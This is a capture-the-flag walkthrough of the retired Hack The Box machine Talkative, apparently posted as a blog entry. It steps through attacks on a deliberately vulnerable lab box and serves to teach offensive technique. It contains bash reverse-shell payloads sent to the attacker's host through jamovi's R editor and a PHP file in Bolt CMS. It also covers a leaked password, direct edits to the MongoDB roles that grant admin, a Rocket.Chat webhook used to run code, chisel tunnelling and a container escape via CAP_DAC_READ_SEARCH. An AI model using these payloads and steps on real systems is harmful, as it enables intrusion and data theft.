Hey guys, back again with another exciting write-up. Today we are going to discuss the Talkative Hack The Box machine, an interesting box where credentials leaked from a jamovi data file get us into Bolt CMS for a user shell, and direct manipulation of the Rocket.Chat MongoDB database (a NoSQL database, no injection needed) gets us the root flag.
It is rated Hard and is now retired on Hack The Box.
ENUMERATION
As usual, we start with an nmap scan:
STEP 1: nmap -sC -sV 10.10.11.155
Looking through the nmap report, I found two interesting ports besides the usual web port: 3000 and 8080.
So let us check these out.
First, add talkative.htb to /etc/hosts so the website resolves.
Then visit the website.
BOLT CMS
The site runs Bolt CMS, which is very interesting, but we need a username and password for its back end.
Next, I checked port 3000: http://talkative.htb:3000
This is a Rocket.Chat instance.
Registration is open, so I registered an account.
After logging in I found that the admin user is Saul Goodman, which may come in handy later.
Next, I checked port 8080: http://talkative.htb:8080
JAMOVI
This is jamovi.
It ships an Rj editor that runs arbitrary R code, and R's system() can execute OS commands, so let us try a bash reverse shell.
Before that, start a listener on your local machine:
STEP 2: nc -lvnp 4040
STEP 3: system('bash -c "bash -i >& /dev/tcp/10.10.14.xx/4040 0>&1"')
Then press Ctrl+Shift+Enter to run the code.
Boooooooommmmm!!!
This gives a root shell, but inside a Docker container rather than a user shell on the host.
Looking around the container, I found /root/bolt-administration.omv, which looked interesting. A .omv file is a zip archive, but the container had nothing to unzip it with and our plain netcat shell gave no easy way to pull it back to the local machine.
So I switched to pwncat, which can transfer files over the existing shell. Install it with:
STEP 4: pip3 install pwncat-cs
or grab it from its GitHub repository.
Now set up the listener:
STEP 5: pwncat-cs -lp 4040
Enter the reverse-shell payload again in the Rj editor and run it.
You will get the shell in pwncat.
Next, use pwncat's download command to copy the file to your local machine:
STEP 6: download /root/bolt-administration.omv
Next, unzip the file:
STEP 7: unzip bolt-administration.omv
Open the extracted xdata.json and you can see a username and password:
username: admin and password: jeO09ufhWD<s
Let us try this username and password on the Bolt CMS login.
Booooooooooommmmmm!!!!!
Now we have access to the Bolt CMS back end.
Next, I checked the configuration files.
Here we can edit existing files, but we cannot upload new ones.
Two files are interesting: bundles.php and preload.php. preload.php would only run when the website restarts, so I wrote the reverse shell into bundles.php instead.
Before that, fire up pwncat:
STEP 8: pwncat-cs -lp 5050
STEP 9: <?php system('bash -c "bash -i >& /dev/tcp/10.10.14.xx/5050 0>&1"'); ?>
Booooooooommmmmm!!!!!
Now you will get the shell. Use pwncat's back command to leave the local prompt and return to the remote shell:
STEP 10: back
Next, run hostname -i: the container has an address on the 172.17.0.0/16 Docker bridge, and the Docker host itself sits at the bridge gateway, 172.17.0.1.
So let us use that address to log in to the host over SSH.
GETTING USER SHELL
STEP 11: ssh saul@172.17.0.1
and enter the password: jeO09ufhWD<s
Booooooooooooooooommmm!!!!!
Now you have a user shell on the host machine.
STEP 12: cat user.txt
Let us move on to root.
DOCKER ANALYSIS
So let us look at the docker-proxy processes, which show which container ports are published on the host:
STEP 13: ps auxww | grep docker-proxy
172.18.0.2 has port 8080 forwarded to it, which is jamovi.
172.17.0.3 has port 3000 forwarded to it, which is Rocket.Chat.
172.17.0.4 through 172.17.0.19 (the address of this container changed between checks) has port 80 forwarded to it, which is the Bolt CMS website.
172.17.0.2 has no port forwarded to it at all, so it is only reachable from inside the host network.
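The mapping above is read off the docker-proxy command lines by eye. The following is an added example (not part of the original write-up) that does the same thing programmatically: it parses `ps auxww` output for docker-proxy processes into a host-port to container mapping and then reports which container addresses have nothing published, i.e. the ones worth scanning from the foothold. The ps lines and the list of observed bridge neighbours are constructed for the demo; only the IP addresses mirror the write-up.

```javascript
// Added example: recover Docker port publications from `ps auxww` output and
// flag containers with no published port. Sample data is constructed.
const SAMPLE_PS = `
root  1234  0.0  0.1  /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 8080 -container-ip 172.18.0.2 -container-port 8080
root  1235  0.0  0.1  /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 3000 -container-ip 172.17.0.3 -container-port 3000
root  1236  0.0  0.1  /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 80 -container-ip 172.17.0.4 -container-port 80
saul  2001  0.0  0.0  grep docker-proxy
`;

// One mapping per docker-proxy process; unrelated lines (such as the grep
// itself, which has no -host-port flag) are skipped.
function parseDockerProxy(psOutput) {
  const mappings = [];
  for (const line of psOutput.split('\n')) {
    if (!line.includes('docker-proxy')) continue;
    const flag = (name) => {
      const m = line.match(new RegExp(`-${name} (\\S+)`));
      return m ? m[1] : null;
    };
    if (!flag('host-port')) continue;
    mappings.push({
      proto: flag('proto') || 'tcp',
      hostIp: flag('host-ip'),
      hostPort: Number(flag('host-port')),
      containerIp: flag('container-ip'),
      containerPort: Number(flag('container-port')),
    });
  }
  return mappings;
}

// Given the mappings and the container addresses actually seen on the bridge
// (for example from `ip neigh` or a ping sweep of 172.17.0.0/24), return the
// ones nothing is forwarded to.
function unpublishedContainers(mappings, observedIps) {
  const published = new Set(mappings.map((m) => m.containerIp));
  return observedIps.filter((ip) => !published.has(ip));
}

// Constructed list of neighbours seen on docker0 for the demo.
const OBSERVED = ['172.17.0.2', '172.17.0.3', '172.17.0.4'];

const mappings = parseDockerProxy(SAMPLE_PS);
for (const m of mappings) {
  console.log(`host :${m.hostPort}/${m.proto} -> ${m.containerIp}:${m.containerPort}`);
}
console.log('no published port:', unpublishedContainers(mappings, OBSERVED));
```

On the real host you would feed `ps auxww` output into parseDockerProxy and the neighbour list from `ip neigh show dev docker0` into unpublishedContainers; here that yields 172.17.0.2, the same container the write-up goes on to scan.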
So let us scan that IP with nmap. There is no nmap on the box, so grab a statically compiled nmap binary, serve it from your local machine and fetch it on the remote host:
STEP 14: python3 -m http.server 5051
STEP 15: curl http://10.10.14.xx:5051/nmap -o nmap
Now make it executable and run a full port scan against the container:
STEP 16: chmod +x nmap && ./nmap --min-rate 1000 -p- 172.17.0.2
Port 27017 is open, which is the default port of MongoDB.
So let us forward that port from the container to our local machine to get access to the database.
Before that, download chisel from https://github.com/jpillora/chisel
and copy the binary to the remote machine.
Then start the chisel server on your local machine:
STEP 17: ./chisel server -p 8000 --reverse
And on the remote host, open a reverse tunnel to the MongoDB port:
STEP 18: ./chisel client 10.10.14.35:8000 R:27017:172.17.0.2:27017
Now 172.17.0.2:27017 is reachable as localhost:27017 on our machine.
Next we enumerate the MongoDB instance.
Before that, install the MongoDB shell (mongosh) on your local machine.
Open a terminal and run mongosh; it connects to localhost:27017 by default.
Because of the port forward, you are now talking to the database inside the remote container.
STEP 19: show dbs
I checked the admin database first but found nothing of interest, so let us look at meteor, which is the database Rocket.Chat uses.
STEP 20: use meteor
STEP 21: show collections
Now you can see the Rocket.Chat collections.
STEP 22: db.users.find()
Now you can see the Rocket.Chat users, including the account we registered earlier.
Let us change the role of our own user (use the _id of the account you registered) to admin:
STEP 23: db.users.update({"_id": "Rtypdicdqoooo7n8"}, { $set: {"roles": ["admin"]}})
Log in again with your username and password and you will have admin access.
Looking around the Rocket.Chat admin panel, I found the Integrations feature.
An integration can carry a script that Rocket.Chat runs whenever the integration is triggered, so this gives us code execution.
First, download the integration script from the linked source.
Before that, fire up pwncat:
STEP 24: pwncat-cs -lp 1234
Click New Integration
and choose Incoming WebHook.
Fill in the details and enable all the options, including Script Enabled, so the script actually runs.
Paste the payload into the Script box and save.
Refresh the page and you will get the webhook URL.
Just curl that URL to trigger the script:
STEP 25: curl http://talkative.htb:3000/Gklfjlkjfkljfkjfkjkfdjalkririj529i99
Booooooommm!!!!!
After getting the connection, upload CDK.
CDK is an open-source container penetration toolkit and a very handy tool; download it from its GitHub releases page.
Next, upload the binary to the remote machine with pwncat:
STEP 26: upload cdk /root/cdk1
STEP 27: back
Go to the root folder and you will see the cdk1 file.
STEP 28: chmod +x cdk1
STEP 29: ./cdk1 run cap-dac-read-search
boooooooooooooooooooommmm!!!!!!!!
The container has the CAP_DAC_READ_SEARCH capability, which lets this module read files from the host filesystem; with no argument it dumps the host's password file.
STEP 30: ./cdk1 run cap-dac-read-search /root/root.txt
Huuuurrrrh!!! Now you have the root flag.
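Before reaching for CDK it is worth confirming that the container really does hold CAP_DAC_READ_SEARCH, since the cap-dac-read-search module depends on it (it uses open_by_handle_at() to reach files outside the container's mount namespace). The following is an added example, not part of the write-up or of CDK, that decodes the CapEff mask from a /proc/<pid>/status file. The sample status text is constructed: it is Docker's default capability mask with bit 2 (CAP_DAC_READ_SEARCH) added, as a container started with --cap-add DAC_READ_SEARCH would show.

```javascript
// Added example: decode a process's effective capability mask from
// /proc/<pid>/status and check for CAP_DAC_READ_SEARCH. Capability numbers
// follow include/uapi/linux/capability.h (bit index == capability number).
const CAP_NAMES = [
  'CAP_CHOWN', 'CAP_DAC_OVERRIDE', 'CAP_DAC_READ_SEARCH', 'CAP_FOWNER',
  'CAP_FSETID', 'CAP_KILL', 'CAP_SETGID', 'CAP_SETUID', 'CAP_SETPCAP',
  'CAP_LINUX_IMMUTABLE', 'CAP_NET_BIND_SERVICE', 'CAP_NET_BROADCAST',
  'CAP_NET_ADMIN', 'CAP_NET_RAW', 'CAP_IPC_LOCK', 'CAP_IPC_OWNER',
  'CAP_SYS_MODULE', 'CAP_SYS_RAWIO', 'CAP_SYS_CHROOT', 'CAP_SYS_PTRACE',
  'CAP_SYS_PACCT', 'CAP_SYS_ADMIN', 'CAP_SYS_BOOT', 'CAP_SYS_NICE',
  'CAP_SYS_RESOURCE', 'CAP_SYS_TIME', 'CAP_SYS_TTY_CONFIG', 'CAP_MKNOD',
  'CAP_LEASE', 'CAP_AUDIT_WRITE', 'CAP_AUDIT_CONTROL', 'CAP_SETFCAP',
  'CAP_MAC_OVERRIDE', 'CAP_MAC_ADMIN', 'CAP_SYSLOG', 'CAP_WAKE_ALARM',
  'CAP_BLOCK_SUSPEND', 'CAP_AUDIT_READ', 'CAP_PERFMON', 'CAP_BPF',
  'CAP_CHECKPOINT_RESTORE',
];

// Turn a hex mask such as "00000000a80425fb" into the list of capability names.
function decodeCapMask(hexMask) {
  const mask = BigInt('0x' + hexMask.trim());
  const caps = [];
  for (let bit = 0; bit < CAP_NAMES.length; bit++) {
    if ((mask >> BigInt(bit)) & 1n) caps.push(CAP_NAMES[bit]);
  }
  return caps;
}

// Pull the CapEff line out of /proc/<pid>/status text and decode it.
function parseCapEff(statusText) {
  const m = statusText.match(/^CapEff:\s*([0-9a-fA-F]+)/m);
  if (!m) throw new Error('no CapEff line in status text');
  return decodeCapMask(m[1]);
}

function hasCap(statusText, capName) {
  return parseCapEff(statusText).includes(capName);
}

// Docker's default capability set for an unprivileged container.
const DOCKER_DEFAULT = '00000000a80425fb';

// Constructed /proc/self/status excerpt: the default set plus bit 2
// (0x4), i.e. CAP_DAC_READ_SEARCH, as --cap-add DAC_READ_SEARCH would give.
const SAMPLE_STATUS = [
  'Name:\tbash',
  'CapInh:\t0000000000000000',
  'CapPrm:\t00000000a80425ff',
  'CapEff:\t00000000a80425ff',
  'CapBnd:\t00000000a80425ff',
].join('\n');

// Stand-alone run: inspect the current process if /proc is available,
// otherwise fall back to the constructed sample.
let statusText = SAMPLE_STATUS;
try {
  statusText = require('fs').readFileSync('/proc/self/status', 'utf8');
} catch (e) {
  // not on Linux or no require(): keep the sample
}
console.log('effective caps:', parseCapEff(statusText).join(' '));
console.log('CAP_DAC_READ_SEARCH present:', hasCap(statusText, 'CAP_DAC_READ_SEARCH'));
```

Run inside the Rocket.Chat container this reports whether the extra capability is there; against a stock container the decoded default mask contains 14 capabilities and CAP_DAC_READ_SEARCH is not among them, which is exactly why cdk's cap-dac-read-search would fail there.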
I hope this article was clear. If you liked it, please support us.
OSWE student